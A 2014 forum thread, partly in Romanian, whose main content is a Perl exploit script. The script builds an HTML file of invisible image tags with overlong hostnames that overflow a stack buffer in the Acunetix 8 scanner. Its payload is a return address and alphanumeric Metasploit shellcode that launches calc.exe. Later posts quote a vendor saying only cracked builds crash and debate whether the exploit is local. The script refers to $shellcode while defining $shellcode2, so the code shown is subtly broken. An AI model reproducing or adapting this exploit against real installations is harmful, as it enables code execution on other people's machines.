SirGod Posted April 24, 2014 Have fun!

# Exploit Title: Acunetix Stack Based overflow
# Date: 24/04/14
# Exploit Author: Danor Cohen (An7i) - http://an7isec.blogspot.co.il/2014/04/pown-noobs-acunetix-0day.html
# Vendor Homepage: http://www.acunetix.com/
# Software Link: http://www.acunetix.com/vulnerability-scanner/download/
# Version: 8 build 20120704
# Tested on: XP
# This exploit generates an HTML file; if this HTML is scanned with ACUNETIX, the shell will be executed.
#
# NOTE(review): the script itself only writes index.html into the current
# directory -- there is no network activity in it. The "Version"/"Tested on"
# lines are the author's claims; the vendor reply later in this thread says
# the crash did not reproduce on genuine v8/v9 builds.
# NOTE(review): no `use strict; use warnings;` (Perl::Critic severity 5), so
# $FILE below is an undeclared package global and undeclared variable names
# are not diagnosed at compile time.

my $file= "index.html";

# HTML envelope written around the generated <img> tags.
my $HTMLHeader1 = "<html>\r\n";
my $HTMLHeader2 = "\r\n</html>";

# Every crafted hostname is emitted as an <img src=http://...> tag styled with
# opacity 0, so the page renders blank in a browser while the src URLs stay
# present in the markup (presumably so a crawler still follows them -- not
# verifiable from this file).
my $IMGheader1 = "<img style=\"opacity:0.0;filter:alpha(opacity=0);\" src=http://";
my $IMGheader2 = "><br>\n";

# Five decoy hostnames, each padded with 190 dots.
my $DomainName1 = "XSS";
my $DomainName2 = "CSRF";
my $DomainName3 = "DeepScan";
my $DomainName4 = "NetworkScan";
my $DomainName5 = "DenialOfService";
my $GeneralDotPadding = "." x 190;

# Sixth hostname: name plus dots is padded to exactly 202 characters.
my $ExploitDomain = "SQLInjection";
my $DotPadding = "." x (202-length($ExploitDomain));
my $Padding1 = "A"x66;
my $Padding2 = "B"x4;
my $FlowCorrector = "500f"; #0x66303035 : readable memory location for fixing the flow
my $EIPOverWrite = "]Qy~"; #0x7e79515d (JMP ESP from SXS.DLL).

# windows/exec - 461 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_upper
# VERBOSE=false, PrependMigrate=false, EXITFUNC=thread,
# CMD=calc.exe
# NOTE(review): Metasploit banner and byte string reproduced exactly as
# posted; every byte is printable ASCII in the 0x30-0x5a range, which makes
# the literal below a straightforward signature for detecting this PoC file.
my $shellcode2 =
"\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a"
."\x56\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48"
."\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51"
."\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43"
."\x4a\x4a\x49\x4b\x4c\x5a\x48\x4b\x39\x33\x30\x45\x50\x53"
."\x30\x33\x50\x4c\x49\x4a\x45\x46\x51\x48\x52\x52\x44\x4c"
."\x4b\x36\x32\x50\x30\x4c\x4b\x51\x42\x34\x4c\x4c\x4b\x51"
."\x42\x35\x44\x4c\x4b\x52\x52\x37\x58\x54\x4f\x48\x37\x51"
."\x5a\x57\x56\x50\x31\x4b\x4f\x46\x51\x4f\x30\x4e\x4c\x37"
."\x4c\x45\x31\x33\x4c\x45\x52\x36\x4c\x47\x50\x59\x51\x58"
."\x4f\x54\x4d\x53\x31\x49\x57\x4d\x32\x4c\x30\x50\x52\x46"
."\x37\x4c\x4b\x31\x42\x44\x50\x4c\x4b\x30\x42\x57\x4c\x45"
."\x51\x4e\x30\x4c\x4b\x57\x30\x34\x38\x4b\x35\x59\x50\x42"
."\x54\x31\x5a\x53\x31\x48\x50\x36\x30\x4c\x4b\x37\x38\x52"
."\x38\x4c\x4b\x46\x38\x51\x30\x43\x31\x49\x43\x4a\x43\x47"
."\x4c\x47\x39\x4c\x4b\x56\x54\x4c\x4b\x45\x51\x48\x56\x36"
."\x51\x4b\x4f\x56\x51\x39\x50\x4e\x4c\x39\x51\x38\x4f\x54"
."\x4d\x43\x31\x49\x57\x56\x58\x4b\x50\x43\x45\x4a\x54\x35"
."\x53\x53\x4d\x4b\x48\x57\x4b\x43\x4d\x57\x54\x34\x35\x5a"
."\x42\x31\x48\x4c\x4b\x56\x38\x37\x54\x33\x31\x48\x53\x32"
."\x46\x4c\x4b\x34\x4c\x50\x4b\x4c\x4b\x56\x38\x35\x4c\x43"
."\x31\x58\x53\x4c\x4b\x43\x34\x4c\x4b\x43\x31\x4e\x30\x4b"
."\x39\x51\x54\x31\x34\x56\x44\x51\x4b\x51\x4b\x43\x51\x36"
."\x39\x51\x4a\x30\x51\x4b\x4f\x4b\x50\x50\x58\x51\x4f\x30"
."\x5a\x4c\x4b\x54\x52\x4a\x4b\x4b\x36\x31\x4d\x33\x5a\x53"
."\x31\x4c\x4d\x4b\x35\x4f\x49\x55\x50\x35\x50\x35\x50\x46"
."\x30\x42\x48\x36\x51\x4c\x4b\x32\x4f\x4b\x37\x4b\x4f\x58"
."\x55\x4f\x4b\x4b\x50\x45\x4d\x36\x4a\x34\x4a\x43\x58\x4e"
."\x46\x4d\x45\x4f\x4d\x4d\x4d\x4b\x4f\x39\x45\x57\x4c\x43"
."\x36\x43\x4c\x44\x4a\x4d\x50\x4b\x4b\x4d\x30\x42\x55\x34"
."\x45\x4f\x4b\x30\x47\x54\x53\x34\x32\x42\x4f\x52\x4a\x33"
."\x30\x51\x43\x4b\x4f\x59\x45\x45\x33\x33\x51\x52\x4c\x35"
."\x33\x46\x4e\x35\x35\x53\x48\x52\x45\x45\x50\x41\x41";

# One <img> tag per hostname.
my $FinalDomainName1 = $IMGheader1.$DomainName1.$GeneralDotPadding.$IMGheader2;
my $FinalDomainName2 = $IMGheader1.$DomainName2.$GeneralDotPadding.$IMGheader2;
my $FinalDomainName3 = $IMGheader1.$DomainName3.$GeneralDotPadding.$IMGheader2;
my $FinalDomainName4 = $IMGheader1.$DomainName4.$GeneralDotPadding.$IMGheader2;
my $FinalDomainName5 = $IMGheader1.$DomainName5.$GeneralDotPadding.$IMGheader2;
my $FinalExploitDomain = $IMGheader1.$ExploitDomain.$DotPadding.$Padding1.$FlowCorrector.$Padding2.$EIPOverWrite.$shellcode.$IMGheader2;

# NOTE(review): two-arg open with the mode interpolated into the filename,
# an undeclared global handle, and no return check -- Perl::Critic flags all
# three. $file is a fixed literal here, so there is no mode-injection risk in
# this script, but an unwritable directory still prints "Created successfully"
# because neither open() nor close() is checked. Idiomatic form:
#   open my $fh, '>', $file or die "open $file: $!";  ...  close $fh or die $!;
open($FILE,">$file");
print $FILE
$HTMLHeader1.$FinalDomainName1.$FinalDomainName2.$FinalDomainName3.$FinalDomainName4.$FinalDomainName5.$FinalExploitDomain.$HTMLHeader2;
close($FILE);
print"Acunetix Killer File Created successfully\n";
tpad Posted April 24, 2014 (edited) — quoting acunetix (39 minutes ago): "We cannot reproduce this crash/code execution with any version of Acunetix WVS v8 or v9. However, we could reproduce the crash with some cracked versions of Acunetix WVS v8. In v8, the crack replaced the executable with another executable." It figures. Edited April 24, 2014 by tpad
sleed Posted April 24, 2014 Foarte tare! L-a testat cineva? Ca eu nu am Acunetix.
neox Posted April 26, 2014 La prima vedere pare interesant, dar nu este un exploit remote, este un exploit local: se vede clar crearea fisierului index.html (An7i Security: Pwn the n00bs - Acunetix 0day ---> video). Ori sunt eu batut in cap, dar asta este un exploit local. De exemplu, exploitul asta de la exploit-db, "Acunetix 8 build 20120704 - Remote Stack Based Overflow", arata ca un exploit remote, dar tot asa: "create file", foloseste payload ca calc si back-connect, nu atac direct pe port sau alte minuni ca sa fie remote. In video-ul asta, tot asa, create file. Eu zic ca asta este un exploit local.